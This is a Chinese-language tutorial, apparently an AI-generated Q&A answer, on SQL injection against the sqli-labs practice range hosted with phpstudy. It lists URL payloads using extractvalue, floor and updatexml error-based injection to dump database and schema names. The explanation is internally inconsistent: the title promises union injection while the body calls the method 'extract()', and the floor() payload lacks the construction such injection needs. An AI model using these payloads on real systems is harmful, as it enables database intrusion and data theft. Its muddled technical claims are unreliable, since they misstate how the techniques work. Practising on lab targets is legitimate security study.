基于phpstudy 搭建sqllib靶场,使用union注入完成less1、less2 分别使用ex()报错和floor()报错注入完成less-5、使用updatexml()报错完成关卡less-6
时间: 2024-09-06 08:06:57 浏览: 41
基于phpstudy搭建sqllib靶场是一个利用phpstudy软件和sql-1ib靶场环境来学习和练习SQL注入技术的过程。这里提供一个大致的步骤指南,但请注意,进行SQL注入实验应在合法的测试环境中进行,避免进行非法的渗透测试。
1. 安装phpstudy软件,并启动服务。
2. 下载sqllib靶场,根据其文档或说明文件进行安装和配置。
3. 配置好靶场后,启动web服务。
接下来,我们将针对不同的关卡介绍如何使用不同的SQL注入技术:
**less1 和 less2 (使用extract()函数报错注入)**
1. 找到可能存在SQL注入的输入点,例如表单提交或URL参数。
2. 尝试注入一些基本的SQL注入代码,比如单引号(')来检查是否存在SQL注入漏洞。
3. 如果存在注入点,使用extract()函数配合双写技术来触发报错。例如,如果id参数可控,可以尝试如下的URL:
```
?id=1' union select 1, extractvalue(1,concat(0x7e,database()))#
?id=1' union select 1, extractvalue(1,concat(0x7e,(select group_concat(schema_name) from information_schema.schemata)))#
```
**less-5 (使用floor()函数报错注入)**
1. 同样找到可能存在SQL注入的输入点。
2. 使用floor()函数和一些技巧来构造报错注入。例如:
```
?id=1' and floor(rand(0) * (select group_concat(schema_name) from information_schema.schemata))#
```
**less-6 (使用updatexml()函数报错注入)**
1. 确定可以注入的点。
2. 利用updatexml()函数来触发报错。例如:
```
?id=1' and updatexml(1,concat(0x7e,(select group_concat(schema_name) from information_schema.schemata)),1)#
```
阅读全文